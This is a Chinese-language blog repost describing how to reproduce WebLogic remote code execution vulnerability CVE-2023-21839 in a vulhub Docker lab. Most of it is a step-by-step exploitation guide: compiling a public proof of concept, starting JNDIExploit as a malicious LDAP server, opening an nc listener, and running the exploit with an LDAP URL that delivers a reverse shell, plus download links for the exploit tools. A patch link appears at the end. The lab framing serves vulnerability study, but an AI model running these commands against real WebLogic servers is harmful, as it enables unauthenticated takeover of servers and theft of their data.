Weblogic远程代码执行漏洞 CVE-2023-21839

Weblogic远程代码执行漏洞 CVE-2023-21839
2023-3-9 17:13:0 Author: mp.weixin.qq.com(查看原文) 阅读量:6 收藏

介绍

WebLogic存在远程代码执行漏洞（CVE-2023-21839），由于Weblogic IIOP/T3协议存在缺陷，当IIOP/T3协议开启时，允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server，漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

影响范围

WebLogic_Server = 12.2.1.3.0

WebLogic_Server = 12.2.1.4.0

WebLogic_Server = 14.1.1.0.0

环境搭建

环境分为如下情况：

1.攻击机(windows10)：IP地址:192.168.19.130

2.漏洞机器(centos8)：dockers服务 IP地址:192.168.19.134

漏洞机器搭建

1.利用vulhub一键搭建环境，已安装了vulhub可以直接更新拉取镜像

cd /usr/local/soft/vulhub/weblogic docker-compose build docker-compose up -d

2.漏洞环境：（12.2.1.3.0）

3.环境搭建成功访问：

http://ip:7001/console

漏洞复现：

准备poc

1.下载poc

https://github.com/4ra1n/CVE-2023-21839

安装go环境（本文略过）
执行编译命令

cd cmdgo build -o  CVE-2023-21839.exell

起ldap服务：

1.准备JNDIExploit-1.4-SNAPSHOT.jar，为反弹shell做准备（java环境安装本文略过）

  java -jar JNDIExploit-1.4-SNAPSHOT.jar -i  192.168.19.134

2.监听端口

nc -l 9999

漏洞利用

CVE-2023-21839.exe -ip 192.168.19.134 -port 7001 -ldap ldap://192.168.19.134:1389/Basic/ReverseShell/192.168.19.134/9999

相关链接

补丁下载连接：

https://support.oracle.com/rs?type=doc&id=2917213.2

Weblogic-CVE-2023-21839poc文件下载地址：

链接：https://pan.baidu.com/s/1akarfZGH7Jng6VUz2mNrqQ

提取码：ps6q

Weblogic-CVE-2023-21839.jar下载:

链接：https://pan.baidu.com/s/1akarfZGH7Jng6VUz2mNrqQ

提取码：ps6q

扫描二维码关注我们

文章来源: https://mp.weixin.qq.com/s?__biz=MzI2MzA3OTgxOA==&mid=2657164391&idx=1&sn=22a5a0e23ab96727d0992ad2885e1ce4&chksm=f1d4ee82c6a36794c73e77ad5bed0ecaadd1ff560c3806d276982ec4b538784a1a90489aa840&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh